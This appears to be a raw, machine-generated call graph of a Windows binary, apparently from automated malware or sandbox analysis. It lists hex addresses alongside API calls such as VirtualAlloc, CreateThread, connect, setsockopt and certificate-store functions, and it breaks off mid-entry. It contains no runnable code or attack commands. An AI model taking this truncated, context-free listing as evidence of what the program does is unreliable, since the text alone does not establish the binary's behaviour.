108328->108329 108331 420316e 108328->108331 108330 4203160 InterlockedExchange 108329->108330 108330->108330 108330->108331 108408 4201100 108331->108408 108333 420318f 108334 4201100 70 API calls 108333->108334 108335 42031b6 108334->108335 108416 4201060 108335->108416 108343->108251 108347 420ad90 108344->108347 108350 420ada2 108347->108350 108348 420ada8 108358 42072cd 66 API calls __getptd_noexit 108348->108358 108349 420add1 108355 420aded wcstoxl 108349->108355 108360 420e884 GetStringTypeW 108349->108360 108350->108348 108350->108349 108352 420adad 108359 42087f3 11 API calls __cftog_l 108352->108359 108357 4206152 Sleep 108355->108357 108361 42072cd 66 API calls __getptd_noexit 108355->108361 108357->108270 108358->108352 108359->108357 108360->108349 108361->108357 108363 42070c0 108362->108363 108364 4207051 108362->108364 108389 4208641 DecodePointer 108363->108389 108367 420705c 108364->108367 108370 420707f RtlAllocateHeap 108364->108370 108373 42070ac 108364->108373 108377 42070aa 108364->108377 108386 4208641 DecodePointer 108364->108386 108366 42070c6 108390 42072cd 66 API calls __getptd_noexit 108366->108390 108367->108364 108383 42085f9 66 API calls 2 library calls 108367->108383 108384 420844a 66 API calls 8 library calls 108367->108384 108385 4208164 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 108367->108385 108370->108364 108371 42070b8 108370->108371 108371->108271 108387 42072cd 66 API calls __getptd_noexit 108373->108387 108388 42072cd 66 API calls __getptd_noexit 108377->108388 108379->108271 108380->108275 108381->108277 108382->108281 108383->108367 108384->108367 108386->108364 108387->108377 108388->108371 108389->108366 108390->108371 108392 4206601 108391->108392 108393 42065f7 108391->108393 108394 4205b02 InitializeCriticalSectionAndSpinCount 108392->108394 108405 4207009 66 API calls 2 library calls 108392->108405 108404 4201280 DeleteCriticalSection RaiseException __CxxThrowException@8 108393->108404 108394->108288 108394->108289 108397->108283 108398->108289 108399->108292 108400->108294 108401->108297 108402->108300 108403->108303 108404->108392 108405->108394 108407->108312 108409 4201111 108408->108409 108410 420110b 108408->108410 108435 4206d60 108409->108435 108410->108333 108412 4201134 VirtualAlloc 108413 420116f 108412->108413 108414 4201198 108413->108414 108415 420118a VirtualFree 108413->108415 108414->108333 108415->108414 108417 4201071 108416->108417 108418 4201100 70 API calls 108417->108418 108436 4206d6d 108435->108436 108437 4207e4e __ctrlfp __floor_pentium4 108435->108437 108436->108437 108438 4206d9e 108436->108438 108439 4207ebc __floor_pentium4 108437->108439 108440 4207e99 108437->108440 108445 4207ea9 __ctrlfp 108437->108445 108444 4206de8 108438->108444 108446 4207b72 67 API calls __flsbuf 108438->108446 108439->108445 108448 420bcbc 67 API calls 6 library calls 108439->108448 108447 420bc67 66 API calls 3 library calls 108440->108447 108444->108412 108445->108412 108446->108444 108447->108445 108448->108445 108449 6cc53ceb 108450 6cc53cf5 108449->108450 108451 6cc53cff 108449->108451 108495 6cc62230 26 API calls 108451->108495 108496 6cbc14ce 108584 6cbe6a4f 108496->108584 108498 6cbc151b 108600 6cc55053 108498->108600 108503 6cbe7564 26 API calls 108504 6cbc15af 108503->108504 108505 6cbe7564 26 API calls 108504->108505 108506 6cbc163b 108505->108506 108507 6cc5b59e 26 API calls 108506->108507 108508 6cbc1673 memmove 108507->108508 108609 6cc49260 108508->108609 108513 6cbe7564 26 API calls 108514 6cbc1841 108513->108514 108616 6cc4ea20 108514->108616 108517 6cc4ea20 26 API calls 108518 6cbc1883 108517->108518 108624 6cbf9d92 108518->108624 108520 6cbc1895 108521 6cbc18a8 108520->108521 108646 6cc49220 27 API calls 108520->108646 108522 6cbe7564 26 API calls 108521->108522 108524 6cbc18b5 108522->108524 108631 6cc4fa90 108524->108631 108665 6cbdd229 108584->108665 108586 6cbe6b65 108591 6cbe6b6f 108586->108591 108597 6cbe6b7a 108586->108597 108691 6cc624e0 26 API calls 108586->108691 108587 6cbe6a67 108587->108586 108589 6cbe6b1a 108587->108589 108592 6cbe6b90 108587->108592 108598 6cbe6c34 108587->108598 108686 6cbdd409 26 API calls 108587->108686 108687 6cbd585e memcmp 108587->108687 108688 6cbe5d4c 26 API calls 108589->108688 108591->108597 108692 6cc621d0 26 API calls 108591->108692 108689 6cbe5ce4 26 API calls 108592->108689 108597->108498 108690 6cbe651a 27 API calls 108598->108690 108601 6cc5505e 108600->108601 108602 6cbc1543 108601->108602 108700 6cc624e0 26 API calls 108601->108700 108604 6cc187b0 108602->108604 108701 6cbde67d 108604->108701 108607 6cbc15a0 108607->108503 108610 6cc49276 108609->108610 108612 6cbc16bc 108609->108612 108611 6cbc5ad0 RtlFreeHeap 108610->108611 108611->108612 108613 6cc4aaa0 108612->108613 108705 6cc47a80 108613->108705 108617 6cc4ea51 108616->108617 108618 6cbc1867 108617->108618 108619 6cc4eabb 108617->108619 108621 6cc4ea9e 108617->108621 108718 6cc4eb30 RtlFreeHeap 108617->108718 108618->108517 108720 6cc64e50 26 API calls 108619->108720 108719 6cc624e0 26 API calls 108621->108719 108625 6cbf9d98 108624->108625 108626 6cbf9da2 108624->108626 108625->108626 108721 6cbf5758 RtlFreeHeap 108625->108721 108626->108520 108628 6cc56a32 108629 6cc56a47 108628->108629 108630 6cbc5ad0 RtlFreeHeap 108628->108630 108629->108520 108630->108629 108632 6cc50110 3 API calls 108631->108632 108633 6cc4fad3 108632->108633 108634 6cc4fb70 108633->108634 108635 6cc4fadb CreateThread 108633->108635 108722 6cc61e40 26 API calls 108634->108722 108637 6cbc1ae2 108635->108637 108638 6cc4fb0a 108635->108638 108723 6cc4fbe0 SetThreadStackGuarantee 108635->108723 108647 6cc492c0 108637->108647 108640 6cc4fb47 108638->108640 108642 6cbc5ad0 RtlFreeHeap 108638->108642 108643 6cbc5ad0 RtlFreeHeap 108640->108643 108642->108640 108645 6cc4fb54 GetLastError 108643->108645 108645->108637 108646->108521 108648 6cc492e5 108647->108648 108649 6cc492de 108647->108649 109190 6cc48c80 26 API calls 108648->109190 108651 6cc492e3 108649->108651 109191 6cc64b60 26 API calls 108649->109191 108653 6cc625d0 26 API calls 108651->108653 108654 6cbc1b18 108651->108654 108666 6cbdd23f 108665->108666 108669 6cbdd29d 108665->108669 108667 6cbdd275 108666->108667 108668 6cbdd2bb 108666->108668 108693 6cbe48d4 ProcessPrng 108667->108693 108694 6cbdd4a8 26 API calls 108668->108694 108669->108668 108671 6cbdd383 108669->108671 108684 6cbdd27c 108669->108684 108695 6cbe4a5c 26 API calls 108671->108695 108674 6cbdd399 108696 6cbe4a2f 26 API calls 108674->108696 108676 6cbdd3a0 108697 6cbe634c RtlFreeHeap 108676->108697 108678 6cbdd3ae 108679 6cc467e8 3 API calls 108678->108679 108680 6cbdd3c6 108679->108680 108681 6cbdd3fe 108680->108681 108682 6cbdd3d0 108680->108682 108699 6cc61e20 26 API calls 108681->108699 108698 6cbe4097 RtlFreeHeap 108682->108698 108684->108587 108686->108587 108687->108587 108688->108586 108689->108586 108690->108586 108693->108684 108694->108684 108695->108674 108696->108676 108697->108678 108698->108684 108702 6cbc5a90 3 API calls 108701->108702 108703 6cbde68e 108702->108703 108703->108607 108704 6cc61e40 26 API calls 108703->108704 108706 6cc50110 3 API calls 108705->108706 108707 6cc47ac2 108706->108707 108708 6cc47acc 108707->108708 108709 6cc47b4e 108707->108709 108712 6cbc180b 108708->108712 108716 6cc64c50 26 API calls 108708->108716 108717 6cc61e40 26 API calls 108709->108717 108712->108513 108718->108621 108720->108618 108721->108628 108730 6cbf9e6e 108723->108730 108731 6cbf9e8d 108730->108731 108732 6cbf9ea7 108731->108732 108744 6cc4fcb0 108731->108744 108734 6cc4ea20 26 API calls 108732->108734 108745 6cc4fcec 108744->108745 108746 6cc4fd80 108745->108746 108746->108732 109190->108649 109191->108651 109192 6cbf4268 109225 6cbe7584 109192->109225 109195 6cbf4612 109196 6cc625d0 26 API calls 109195->109196 109240 6cc624e0 26 API calls 109195->109240 109196->109195 109197 6cbe7584 2 API calls 109224 6cbf4285 109197->109224 109198 6cbf4486 109198->109195 109212 6cbf44b6 109198->109212 109233 6cbf4f03 27 API calls 109198->109233 109200 6cbf459b 109237 6cbf46f5 27 API calls 109200->109237 109201 6cbf43bb NtDeviceIoControlFile 109201->109224 109204 6cbf45a7 109238 6cbf47fc WakeByAddressSingle 109204->109238 109205 6cbf454e 109205->109200 109210 6cbf4575 109205->109210 109235 6cbf4e44 29 API calls 109205->109235 109207 6cbf4403 RtlNtStatusToDosError 109207->109224 109236 6cbf4e44 29 API calls 109210->109236 109212->109195 109212->109205 109216 6cbf4686 109212->109216 109219 6cbf4698 109212->109219 109234 6cbf4f03 27 API calls 109212->109234 109213 6cbf3f95 RtlFreeHeap 109213->109224 109214 6cbf45ba 109241 6cc622d0 26 API calls 109216->109241 109217 6cbf4447 109239 6cbf47fc WakeByAddressSingle 109217->109239 109242 6cc622d0 26 API calls 109219->109242 109224->109195 109224->109197 109224->109198 109224->109201 109224->109207 109224->109213 109224->109217 109229 6cbf3edc 28 API calls 109224->109229 109230 6cbf5588 RtlFreeHeap 109224->109230 109231 6cbf3eaa 28 API calls 109224->109231 109232 6cbf47fc WakeByAddressSingle 109224->109232 109226 6cbe7594 109225->109226 109227 6cbe75b0 109225->109227 109226->109224 109243 6cc64d90 WaitOnAddress GetLastError 109227->109243 109229->109224 109230->109224 109231->109224 109232->109224 109233->109198 109234->109212 109235->109210 109236->109200 109237->109204 109238->109214 109239->109204 109243->109226 109244 6cc0b537 109245 6cc0be40 109244->109245 109246 6cc0b55e 109244->109246 109409 6cc622d0 26 API calls 109245->109409 109247 6cc0b6e9 109246->109247 109361 6cc4fdd0 30 API calls __aulldiv 109246->109361 109252 6cc0baba 109247->109252 109359 6cc2a398 109247->109359 109251 6cc0be52 109410 6cc624e0 26 API calls 109251->109410 109255 6cc0bac9 109252->109255 109257 6cc0be81 109252->109257 109260 6cc0bc0b 109252->109260 109264 6cc0bc22 109252->109264 109253 6cc0b57a 109256 6cbe7584 2 API calls 109253->109256 109258 6cc0b59d 109256->109258 109411 6cc622d0 26 API calls 109257->109411 109258->109251 109261 6cc0b5a6 109258->109261 109260->109264 109388 6cc1399e 46 API calls 109260->109388 109308 6cc0b671 109261->109308 109362 6cbeaad9 45 API calls 109261->109362 109262 6cc0be93 109265 6cc625d0 26 API calls 109262->109265 109389 6cc3417d 32 API calls 109264->109389 109266 6cc0bc45 109390 6cbf796c 109266->109390 109267 6cc0b6f2 109371 6cbd32d8 26 API calls 109267->109371 109268 6cc0b6dd 109370 6cbf5841 WakeByAddressSingle 109268->109370 109274 6cc0b5ef 109274->109308 109363 6cc5422a 45 API calls 109274->109363 109278 6cc0b7ca 109375 6cbeab5d 26 API calls 109278->109375 109279 6cc0b60c 109279->109308 109364 6cbeab44 26 API calls 109279->109364 109280 6cc0bc67 109395 6cc1176d RtlFreeHeap 109280->109395 109282 6cc0ba9d 109385 6cbf5841 WakeByAddressSingle 109282->109385 109284 6cc0b7f4 109376 6cc599b8 28 API calls 109284->109376 109285 6cc0b626 109365 6cc50060 26 API calls 109285->109365 109288 6cc0b74f 109288->109282 109372 6cc5422a 45 API calls 109288->109372 109290 6cc0b707 109290->109278 109290->109288 109383 6cbde263 26 API calls 109290->109383 109293 6cc0b823 109311 6cc0b85b 109293->109311 109377 6cbea8ab 30 API calls 109293->109377 109294 6cc0bc83 109396 6cbc7b7d RtlFreeHeap 109294->109396 109295 6cc0b784 109295->109282 109298 6cc0b78c 109295->109298 109304 6cc0bb6f 109298->109304 109373 6cc570dd 41 API calls 109298->109373 109300 6cc0ba58 109300->109278 109302 6cc0ba64 109300->109302 109301 6cc0bc8e 109316 6cc0bca9 109301->109316 109397 6cbf8636 RtlFreeHeap 109301->109397 109302->109288 109305 6cc0ba71 109302->109305 109303 6cc0b84f 109378 6cbeaad9 45 API calls 109303->109378 109387 6cbf5841 WakeByAddressSingle 109304->109387 109384 6cbea9d3 RtlFreeHeap 109305->109384 109308->109267 109308->109268 109309 6cc0b645 109309->109308 109366 6cbea8c7 30 API calls 109309->109366 109311->109262 109311->109282 109319 6cc0b96f 109311->109319 109379 6cbeab7d 26 API calls 109311->109379 109315 6cc0bcca 109399 6cbc7b7d RtlFreeHeap 109315->109399 109316->109315 109398 6cbf8636 RtlFreeHeap 109316->109398 109317 6cc0b7a9 109322 6cc0bb41 109317->109322 109323 6cc0b7b5 109317->109323 109380 6cc50060 26 API calls 109319->109380 109327 6cc0b7c5 109322->109327 109386 6cc569ca 45 API calls 109322->109386 109323->109327 109374 6cc56472 45 API calls 109323->109374 109324 6cc0b692 109367 6cc4fdd0 30 API calls __aulldiv 109324->109367 109326 6cc0bcd5 109400 6cbe408b RtlFreeHeap 109326->109400 109333 6cbc5ad0 RtlFreeHeap 109327->109333 109328 6cc0b69e 109368 6cc50060 26 API calls 109328->109368 109333->109304 109334 6cc0b994 109334->109282 109336 6cc0b9ac 109334->109336 109335 6cc0b6ba 109369 6cc58d1f 45 API calls 109335->109369 109381 6cbf5841 WakeByAddressSingle 109336->109381 109340 6cc0bcf1 109401 6cbc7b7d RtlFreeHeap 109340->109401 109341 6cc0b9b8 109382 6cc27cec 27 API calls 109341->109382 109343 6cc0bcfc 109349 6cc0bd4d 109343->109349 109402 6cbd5bde RtlFreeHeap 109343->109402 109346 6cc0bd0e 109403 6cbf79b6 RtlFreeHeap 109346->109403 109348 6cc0bd8d 109406 6cbf7ab5 RtlFreeHeap WakeByAddressSingle WaitOnAddress GetLastError 109348->109406 109349->109348 109405 6cbdf185 RtlFreeHeap 109349->109405 109351 6cc0bd16 109404 6cbc7b7d RtlFreeHeap 109351->109404 109352 6cc0bdd3 memmove 109352->109255 109354 6cc0be03 109352->109354 109353 6cc0bd94 109353->109352 109407 6cbf9f82 RtlFreeHeap 109353->109407 109408 6cc23b60 RtlFreeHeap 109354->109408 109412 6cc2a3bf 109359->109412 109361->109253 109362->109274 109363->109279 109364->109285 109365->109309 109366->109324 109367->109328 109368->109335 109369->109308 109370->109247 109371->109290 109372->109295 109373->109317 109374->109327 109375->109284 109376->109293 109377->109303 109378->109311 109379->109319 109380->109334 109381->109341 109382->109247 109383->109300 109384->109282 109385->109247 109386->109327 109387->109252 109388->109264 109389->109266 109392 6cbf7978 109390->109392 109391 6cbf798c 109394 6cbda132 RtlFreeHeap 109391->109394 109392->109391 109393 6cbc5ad0 RtlFreeHeap 109392->109393 109393->109391 109394->109280 109395->109294 109396->109301 109397->109316 109398->109315 109399->109326 109400->109340 109401->109343 109402->109346 109403->109351 109404->109349 109405->109348 109406->109353 109407->109352 109408->109255 109489 6cbde54a WaitOnAddress GetLastError 109412->109489 109414 6cc2a3d1 109415 6cc2c000 109414->109415 109416 6cc2a3f8 109414->109416 109417 6cc2a3ff 109414->109417 109421 6cc624e0 26 API calls 109415->109421 109491 6cbf47fc WakeByAddressSingle 109416->109491 109492 6cbf47fc WakeByAddressSingle 109417->109492 109420 6cc2a40a 109483 6cc2a3fd 109420->109483 109493 6cc2fbc0 27 API calls 109420->109493 109421->109415 109423 6cbde54a WaitOnAddress GetLastError 109423->109483 109424 6cbe7584 2 API calls 109424->109483 109425 6cc27048 32 API calls 109425->109483 109426 6cc2bf55 109426->109415 109427 6cc2bc10 109426->109427 109428 6cc2bb85 109426->109428 109429 6cc2bf30 109427->109429 109508 6cbde263 26 API calls 109427->109508 109506 6cbf47fc WakeByAddressSingle 109428->109506 109432 6cc2bdf9 109507 6cbf47fc WakeByAddressSingle 109432->109507 109436 6cc2c0f9 109509 6cc624e0 26 API calls 109436->109509 109438 6cc2c11c 109490 6cc625b0 26 API calls 109438->109490 109441 6cbd75ac 26 API calls 109441->109483 109444 6cbf47fc WakeByAddressSingle 109444->109483 109446 6cbd7553 26 API calls 109446->109483 109448 6cc270c8 26 API calls 109448->109483 109451 6cc33f5a 26 API calls 109451->109483 109456 6cc07771 32 API calls 109456->109483 109463 6cc2b1c2 memmove 109501 6cbd60ad 26 API calls 109463->109501 109476 6cbd6423 26 API calls 109476->109483 109478 6cbd9f53 26 API calls 109478->109483 109479 6cc33fa7 29 API calls 109479->109483 109480 6cc2b694 memmove 109480->109483 109481 6cbd64aa 26 API calls 109481->109483 109483->109415 109483->109423 109483->109424 109483->109425 109483->109426 109483->109427 109483->109428 109483->109436 109483->109438 109483->109441 109483->109444 109483->109446 109483->109448 109483->109451 109483->109456 109483->109463 109483->109476 109483->109478 109483->109479 109483->109480 109483->109481 109486 6cc2b8ad memmove 109483->109486 109488 6cc33dac 29 API calls 109483->109488 109494 6cc39c46 26 API calls 109483->109494 109495 6cbd679b 26 API calls 109483->109495 109496 6cc2fbc0 27 API calls 109483->109496 109497 6cbd66e8 26 API calls 109483->109497 109498 6cbdbbab 26 API calls 109483->109498 109499 6cbd69c0 26 API calls 109483->109499 109500 6cc2f406 29 API calls 109483->109500 109502 6cbdee67 RtlFreeHeap 109483->109502 109503 6cbdb813 26 API calls 109483->109503 109504 6cbd75ac 26 API calls 109483->109504 109485 6cc2b765 memmove 109485->109483 109505 6cc270c8 26 API calls 109486->109505 109488->109483 109489->109414 109491->109483 109492->109420 109493->109483 109494->109483 109495->109483 109496->109483 109497->109483 109498->109483 109499->109483 109500->109483 109501->109483 109502->109483 109503->109480 109504->109485 109506->109432 109507->109427 109508->109429 109510 6cc1031b 109513 6cbe7b12 109510->109513 109512 6cc1032e 109542 6cbe9d2d 109513->109542 109518 6cbe7c16 WSAGetLastError 109519 6cbe7b8b 109518->109519 109520 6cbe7e88 109519->109520 109521 6cbe7e76 109519->109521 109524 6cc57b7d 26 API calls 109519->109524 109522 6cbe7e9a 109520->109522 109555 6cc622d0 26 API calls 109520->109555 109554 6cc622d0 26 API calls 109521->109554 109526 6cbe7eae 109522->109526 109556 6cbf3f95 RtlFreeHeap 109522->109556 109527 6cbe7c80 getsockname 109524->109527 109526->109512 109529 6cbe7d62 WSAGetLastError 109527->109529 109531 6cbe7cdd 109527->109531 109541 6cbe7e26 109529->109541 109530 6cbe7ead 109530->109512 109531->109521 109532 6cbe7d81 109531->109532 109533 6cbe7d01 109531->109533 109531->109541 109532->109520 109532->109533 109536 6cbe9d2d 26 API calls 109533->109536 109533->109541 109535 6cbe7e65 109553 6cbe7e9a RtlFreeHeap 109535->109553 109538 6cbe7e15 109536->109538 109551 6cbe7a23 RtlFreeHeap 109538->109551 109539 6cbe7e6e 109539->109512 109552 6cbe7e9a RtlFreeHeap 109541->109552 109557 6cbe9d6f 109542->109557 109544 6cbe9d3c 109545 6cbe7b32 109544->109545 109562 6cc61e40 26 API calls 109544->109562 109547 6cc57b7d 109545->109547 109548 6cbe7b47 getpeername 109547->109548 109549 6cc57b89 109547->109549 109548->109518 109548->109519 109563 6cc625b0 26 API calls 109549->109563 109551->109541 109552->109535 109553->109539 109556->109530 109558 6cbe9d85 109557->109558 109559 6cbe9d75 109557->109559 109558->109544 109560 6cbc5a90 3 API calls 109559->109560 109561 6cbe9d84 109560->109561 109561->109544 109564 6cc1b2fa 109565 6cc1b34e 109564->109565 109566 6cc1b2fe 109564->109566 109641 6cc109d3 109566->109641 109568 6cc1b30c 109650 6cc11676 109568->109650 109570 6cc1b31a 109570->109565 109653 6cc0d3b3 109570->109653 109572 6cc1b3e9 109573 6cbe7564 26 API calls 109572->109573 109574 6cc1b41c memmove 109573->109574 109575 6cc1aab8 109574->109575 109578 6cc22740 109575->109578 109579 6cc0d3b3 2 API calls 109575->109579 109581 6cc22752 109575->109581 109583 6cbe7564 26 API calls 109575->109583 109585 6cc1baae 109575->109585 109587 6cc22764 109575->109587 109594 6cc1b57a memmove 109575->109594 109607 6cbf332d memcmp 109575->109607 109617 6cbe7564 26 API calls 109575->109617 109622 6cc60595 memcmp 109575->109622 109623 6cc13580 memcmp 109575->109623 109625 6cc1ba25 109575->109625 109634 6cbf796c RtlFreeHeap 109575->109634 109638 6cbe7a7b RtlFreeHeap 109575->109638 109657 6cc28538 109575->109657 109664 6cbf8227 109575->109664 109674 6cc100a8 memmove 109575->109674 109710 6cc10a13 27 API calls 109575->109710 109711 6cbcaee0 27 API calls 109575->109711 109712 6cc6062e memcmp 109575->109712 109713 6cc13599 memcmp 109575->109713 109714 6cc4699a memcmp 109575->109714 109715 6cc13970 RtlFreeHeap CertCloseStore 109575->109715 109716 6cbe7a23 RtlFreeHeap 109575->109716 109718 6cc57044 RtlFreeHeap 109575->109718 109719 6cc03e5e 56 API calls 109575->109719 109720 6cbf82a2 28 API calls 109575->109720 109721 6cbe9744 27 API calls 109575->109721 109722 6cc1381e RtlFreeHeap 109575->109722 109723 6cbf8216 109575->109723 109744 6cc14390 26 API calls 109575->109744 109745 6cc1a798 54 API calls 109575->109745 109748 6cc622d0 26 API calls 109578->109748 109579->109575 109749 6cc622d0 26 API calls 109581->109749 109586 6cc1b391 memmove 109583->109586 109586->109575 109750 6cc622d0 26 API calls 109587->109750 109590 6cc22776 109751 6cc622d0 26 API calls 109590->109751 109717 6cc13814 RtlFreeHeap CertCloseStore 109594->109717 109598 6cc1b596 memmove 109600 6cc1b5c7 memmove 109598->109600 109629 6cc1ba38 109598->109629 109600->109575 109607->109575 109617->109575 109622->109575 109623->109575 109625->109590 109627 6cc1ba2e 109625->109627 109628 6cc1bab9 109627->109628 109627->109629 109747 6cc0c450 26 API calls 109628->109747 109746 6cc1a417 28 API calls 109629->109746 109634->109575 109638->109575 109642 6cc10a01 109641->109642 109643 6cc109da 109641->109643 109644 6cc625d0 26 API calls 109642->109644 109643->109568 109645 6cc10a13 109644->109645 109752 6cc0f794 27 API calls 109645->109752 109647 6cc10a18 109648 6cc10a1c 109647->109648 109649 6cc625d0 26 API calls 109647->109649 109648->109568 109651 6cc60b07 memcmp 109650->109651 109652 6cc11683 109651->109652 109652->109570 109654 6cc0d3ca 109653->109654 109753 6cc0f7c6 CertDuplicateStore CertDuplicateCertificateContext 109654->109753 109656 6cc0d3d5 109656->109572 109658 6cc2856a 109657->109658 109662 6cc28542 109657->109662 109660 6cbf8227 2 API calls 109658->109660 109659 6cc28567 109659->109575 109661 6cc28572 109660->109661 109662->109659 109663 6cbc5ad0 RtlFreeHeap 109662->109663 109663->109659 109665 6cbf823a 109664->109665 109666 6cbf8232 109664->109666 109670 6cbf824a 109665->109670 109756 6cbf9f82 RtlFreeHeap 109665->109756 109755 6cbea6f6 RtlFreeHeap 109666->109755 109754 6cc472dc CertCloseStore 109670->109754 109671 6cbf825f 109672 6cbf826f 109671->109672 109757 6cbfa320 RtlFreeHeap 109671->109757 109672->109575 109675 6cc10132 109674->109675 109676 6cc100cc memmove 109674->109676 109799 6cc4fdd0 30 API calls __aulldiv 109675->109799 109758 6cc0f807 109676->109758 109679 6cc10146 109682 6cc10161 109679->109682 109683 6cc1016c 109679->109683 109680 6cc100f7 109684 6cc10100 109680->109684 109798 6cc0fe05 RtlFreeHeap 109680->109798 109800 6cc58cfa 30 API calls 109682->109800 109801 6cc58c47 26 API calls 109683->109801 109684->109575 109687 6cc1016a memmove memmove 109802 6cc575ae 26 API calls 109687->109802 109690 6cc101ce 109803 6cc37fd8 249 API calls 109690->109803 109692 6cc101e1 109693 6cc101ea 109692->109693 109694 6cc1022e 109692->109694 109804 6cc3841c RtlFreeHeap 109693->109804 109806 6cc102ec RtlFreeHeap 109694->109806 109697 6cc10202 109805 6cc575ae 26 API calls 109697->109805 109699 6cc10207 109700 6cc10250 109699->109700 109702 6cc10216 109699->109702 109807 6cc58d32 45 API calls 109700->109807 109704 6cc57511 26 API calls 109702->109704 109703 6cc1025a 109703->109684 109810 6cc102ec RtlFreeHeap 109703->109810 109705 6cc1021b 109704->109705 109808 6cc58d32 45 API calls 109705->109808 109708 6cc10278 109809 6cc38459 26 API calls 109708->109809 109710->109575 109711->109575 109712->109575 109713->109575 109714->109575 109715->109575 109716->109575 109717->109598 109718->109575 109719->109575 109721->109575 109722->109575 109724 6cbf8226 109723->109724 109725 6cbf821c 109723->109725 109724->109575 109725->109724 109726 6cbfa4c6 109725->109726 109727 6cbfa438 109725->109727 109740 6cbc5ad0 RtlFreeHeap 109725->109740 109728 6cbfa524 109726->109728 109735 6cbfa547 109726->109735 111277 6cc3f820 26 API calls 109726->111277 109727->109726 109729 6cbc5ad0 RtlFreeHeap 109727->109729 111278 6cbe08f0 RtlFreeHeap 109728->111278 109729->109726 109730 6cbfa57a 111282 6cbe08f0 RtlFreeHeap 109730->111282 109731 6cbfa5fb 111283 6cbe7a7b RtlFreeHeap 109731->111283 109734 6cbfa61b 109737 6cbfa630 109734->109737 109739 6cbc5ad0 RtlFreeHeap 109734->109739 109735->109730 109735->109731 111279 6cc3f840 RtlFreeHeap 109735->111279 111280 6cc3f869 RtlFreeHeap 109735->111280 111281 6cbf1a80 RtlFreeHeap 109735->111281 109737->109575 109739->109737 109740->109725 109744->109575 109745->109575 109752->109647 109753->109656 109754->109671 109755->109665 109756->109670 109757->109672 109759 6cc0f825 109758->109759 109762 6cc0f838 109758->109762 109775 6cc0f953 109759->109775 109815 6cc62860 109759->109815 109764 6cc0f8e6 109762->109764 109817 6cc0cbf0 26 API calls 109762->109817 109819 6cc0f7c6 CertDuplicateStore CertDuplicateCertificateContext 109764->109819 109765 6cc0f98a memmove 109768 6cbf796c RtlFreeHeap 109765->109768 109771 6cc0f9c3 109768->109771 109769 6cc0f8db 109769->109764 109818 6cc04fb4 27 API calls 109769->109818 109770 6cc0f8f9 109820 6cc1916d 30 API calls 109770->109820 109773 6cc0f9d7 memmove 109771->109773 109784 6cc0f9c8 109771->109784 109776 6cc0fa50 memmove 109773->109776 109777 6cc0fa15 memmove 109773->109777 109811 6cc230b2 109775->109811 109780 6cc0fa73 109776->109780 109781 6cc0fa9c memmove 109776->109781 109821 6cc23a0f 27 API calls 109777->109821 109822 6cc5849d 109780->109822 109827 6cc2390b 27 API calls 109781->109827 109829 6cc0fbef RtlFreeHeap 109784->109829 109786 6cc0fabc 109786->109784 109828 6cc0fbd0 56 API calls 109786->109828 109788 6cc0fb52 109830 6cbe9d14 26 API calls 109788->109830 109792 6cc0fb5b 109831 6cc1a357 56 API calls 109792->109831 109794 6cc0f97f 109794->109680 109798->109684 109799->109679 109800->109687 109801->109687 109802->109690 109803->109692 109804->109697 109805->109699 109807->109703 109808->109708 109809->109703 109832 6cc194f3 109811->109832 109946 6cc194a2 109811->109946 109812 6cc0f977 109812->109765 109812->109794 111276 6cc62230 26 API calls 109815->111276 109817->109769 109818->109764 109819->109770 109820->109775 109821->109784 109823 6cc57b7d 26 API calls 109822->109823 109824 6cc584ad setsockopt 109823->109824 109825 6cc0fa85 109824->109825 109826 6cc584cb WSAGetLastError 109824->109826 109825->109781 109825->109788 109826->109825 109827->109786 109828->109784 109830->109792 109833 6cc62860 26 API calls 109832->109833 109834 6cc194fd 109833->109834 109940 6cc5849d 28 API calls 109834->109940 110059 6cc01861 109834->110059 110119 6cc476b7 connect 109834->110119 110122 6cc0131c 109834->110122 110231 6cc01182 109834->110231 110355 6cc01157 109834->110355 110482 6cc57ef1 109834->110482 110561 6cc012db 109834->110561 110670 6cc0126c 109834->110670 110698 6cc0130b 109834->110698 110807 6cc0186f 109834->110807 109835 6cc19512 109836 6cbf796c RtlFreeHeap 109835->109836 109919 6cc1951c 109835->109919 109837 6cc1955c 109836->109837 109838 6cc19565 109837->109838 109839 6cc19594 109837->109839 110873 6cc010af 26 API calls 109838->110873 109841 6cc1a27a 109839->109841 109842 6cc1971a 109839->109842 109844 6cc19570 109839->109844 109843 6cc625d0 26 API calls 109841->109843 110874 6cc46a27 27 API calls 109842->110874 109845 6cc1a28c 109843->109845 110919 6cbf5758 RtlFreeHeap 109844->110919 109846 6cc62860 26 API calls 109845->109846 109849 6cc1a296 109846->109849 109852 6cc625d0 26 API calls 109849->109852 109850 6cc1a0e8 memmove 109850->109919 109851 6cc19779 109853 6cc19795 109851->109853 110875 6cc4738f CertDuplicateCertificateContext 109851->110875 109855 6cc1a2a8 109852->109855 110877 6cc46abd 109853->110877 109858 6cc62860 26 API calls 109855->109858 109861 6cc1a2b2 109858->109861 109859 6cc19787 110876 6cc46a98 26 API calls 109859->110876 109860 6cc197b2 110898 6cc472e6 CertDuplicateStore 109860->110898 109863 6cc19a39 110908 6cc358e5 RtlFreeHeap 109863->110908 109866 6cc19a49 110909 6cc36b94 55 API calls 109866->110909 109867 6cc19801 110899 6cc46f1e CertCloseStore 109867->110899 109870 6cc19a52 memmove 109874 6cc19cb1 109870->109874 109875 6cc19d52 memmove memmove 109870->109875 109871 6cc1980a 110900 6cc46e15 26 API calls 109871->110900 109877 6cc19cf2 memmove 109874->109877 109878 6cc19cb8 memmove 109874->109878 109879 6cc19e6d memmove 109875->109879 109876 6cc19819 109880 6cc1987d 109876->109880 109889 6cc1982c 109876->109889 110901 6cc472e6 CertDuplicateStore 109876->110901 109881 6cc19e00 memmove 109877->109881 109882 6cc19d42 109877->109882 109878->109877 110913 6cc0ffd1 55 API calls 109879->110913 110903 6cc470d5 30 API calls 109880->110903 109881->109879 109882->109879 109885 6cc19ec8 110902 6cbe7a7b RtlFreeHeap 109889->110902 109919->109812 109940->109835 109947 6cc19503 109946->109947 110048 6cc01861 82 API calls 109947->110048 110049 6cc01182 96 API calls 109947->110049 110050 6cc476b7 2 API calls 109947->110050 110051 6cc57ef1 67 API calls 109947->110051 110052 6cc01157 96 API calls 109947->110052 110053 6cc5849d 28 API calls 109947->110053 110054 6cc012db 93 API calls 109947->110054 110055 6cc0130b 93 API calls 109947->110055 110056 6cc0126c 79 API calls 109947->110056 110057 6cc0131c 93 API calls 109947->110057 110058 6cc0186f 84 API calls 109947->110058 109948 6cc19512 109949 6cbf796c RtlFreeHeap 109948->109949 110031 6cc1951c 109948->110031 109950 6cc1955c 109949->109950 109951 6cc19565 109950->109951 109952 6cc19594 109950->109952 111250 6cc010af 26 API calls 